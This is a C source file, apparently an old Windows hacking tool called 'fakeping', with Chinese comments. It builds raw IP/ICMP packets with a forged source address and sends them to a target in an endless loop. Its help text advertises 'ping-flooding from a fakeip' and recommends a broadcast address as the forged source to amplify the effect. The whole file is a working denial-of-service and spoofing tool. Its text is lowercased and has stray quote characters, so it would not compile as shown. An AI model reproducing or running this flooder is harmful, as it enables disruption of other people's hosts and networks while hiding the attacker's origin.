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#include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <stdlib.h> #define seq 0x28376839 #define status_failed 0xffff //错误返回值 typedef struct _iphdr //定义ip首部 { unsigned char h_verlen; //4位首部长度,4位ip版本号 unsigned char tos; //8位服务类型tos unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 ttl unsigned char proto; //8位协议 (tcp, udp 或其他) unsigned short checksum; //16位ip首部校验和 unsigned int sourceip; //32位源ip地址 unsigned int destip; //32位目的ip地址 }ip_header; // // 定义icmp首部 typedef struct _ihdr { byte i_type; //8位类型 byte i_code; //8位代码 ushort i_cksum; //16位校验和 ushort i_id; //识别号(一般用进程号作为识别号) ushort i_seq; //报文序列号 ulong timestamp; //时间戳 }icmp_header; //checksum:计算校验和的子函数 ushort checksum(ushort *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(ushort); } if(size ) { cksum += *(uchar*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (ushort)(~cksum); } //fakeping主函数 int main(int argc, char **argv) { int datasize,errorcode,counter,flag; int timeout=2000, sendseq=0, packetsize=32; char sendbuf[65535]={0}; wsadata wsadata; socket sockraw=(socket)null; struct sockaddr_in destaddr; ip_header ip_header; icmp_header icmp_header; char fakesourceip[20],destip[20]; //接受命令行参数 if (argc<3) { printf("fakeping by shotgun\n"); printf("\tthis program can do ping-flooding from a fakeip\n"); printf("\tusing a broadcast ip as the fakeip will enhance the effect\n"); printf("email:\n"); printf("\[email]tshotgun@xici.net[/email]\n"); printf("homepage:\n"); printf("\thttp://it.xici.net\n"); printf("\thttp://www.patching.net\n"); printf("usage:\n\tfakeping.exe fakesourceip destinationip [packetsize]\n"); printf("example:\n"); printf("\tfakeping.exe\n"); printf("\tfakeping.exe 6400\n"); exit(0); } strcpy(fakesourceip,argv[1]); strcpy(destip,argv[2]); if (argc>3) packetsize=atoi(argv[3]); if (packetsize>60000) { printf("error! packet size too big, must <60k\n"); exit(0); } printf("now fake %s ping %s using packet size=%d bytes\n", fakesourceip, destip, packetsize); printf("\tctrl+c to quit\n"); //初始化sock_raw if((errorcode=wsastartup(makeword(2,1),&wsadata))!=0) { fprintf(stderr,"wsastartup failed: %d\n",errorcode); exitprocess(status_failed); } if((sockraw=wsasocket(af_inet,sock_raw,ipproto_raw,null,0,wsa_flag_overlapped))==invalid_socket) { fprintf(stderr,"wsasocket() failed: %d\n",wsagetlasterror()); exitprocess(status_failed); } flag=true; //设置ip_hdrincl以自己填充ip首部 errorcode=setsockopt(sockraw,ipproto_ip,ip_hdrincl,(char *)&flag,sizeof(int)); if(errorcode==socket_error) printf("set ip_hdrincl error!\n"); __try{ //设置发送超时 errorcode=setsockopt(sockraw,sol_socket,so_sndtimeo,(char*)&timeout,sizeof(timeout)); if (errorcode==socket_error) { fprintf(stderr,"failed to set send timeout: %d\n",wsagetlasterror()); __leave; } memset(&destaddr,0,sizeof(destaddr)); destaddr.sin_family=af_inet; destaddr.sin_addr.s_addr=inet_addr(destip); //填充ip首部 ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位ip版本号,低四位首部长度 ip_header.total_len=htons(sizeof(ip_header)+sizeof(icmp_header)); //16位总长度(字节) ip_header.ident=1; //16位标识 ip_header.frag_and_flags=0; //3位标志位 ip_header.ttl=128; //8位生存时间 ttl ip_header.proto=ipproto_icmp; //8位协议 (tcp, udp 或其他) ip_header.checksum=0; //16位ip首部校验和 ip_header.sourceip=inet_addr(fakesourceip); //32位源ip地址 ip_header.destip=inet_addr(destip); //32位目的ip地址 //填充icmp首部 icmp_header.i_type = 8; icmp_header.i_code = 0; icmp_header.i_cksum = 0; icmp_header.i_id = 2; icmp_header.timestamp = 999; icmp_header.i_seq=999; memcpy(sendbuf, &icmp_header, sizeof(icmp_header)); memset(sendbuf+sizeof(icmp_header), ‘e‘, packetsize); icmp_header.i_cksum = checksum((ushort *)sendbuf, sizeof(icmp_header)+packetsize); memcpy(sendbuf,&ip_header,sizeof(ip_header)); memcpy(sendbuf+sizeof(ip_header), &icmp_header, sizeof(icmp_header)); memset(sendbuf+sizeof(ip_header)+sizeof(icmp_header), ‘e‘, packetsize); memset(sendbuf+sizeof(ip_header)+sizeof(icmp_header)+packetsize, 0, 1); //计算发送缓冲区的大小 datasize=sizeof(ip_header)+sizeof(icmp_header)+packetsize; ip_header.checksum=checksum((ushort *)sendbuf,datasize); //填充发送缓冲区 memcpy(sendbuf,&ip_header, sizeof(ip_header)); while(1) { sleep(100); printf("."); for(counter=0;counter<1024;counter++) { //发送icmp报文 errorcode=sendto(sockraw,sendbuf,datasize,0,(struct sockaddr*)&destaddr,sizeof(destaddr)); if (errorcode==socket_error) printf("\nsend error:%d\n",getlasterror()); } } }//end of try __finally { if (sockraw != invalid_socket) closesocket(sockraw); wsacleanup(); } return 0; } |
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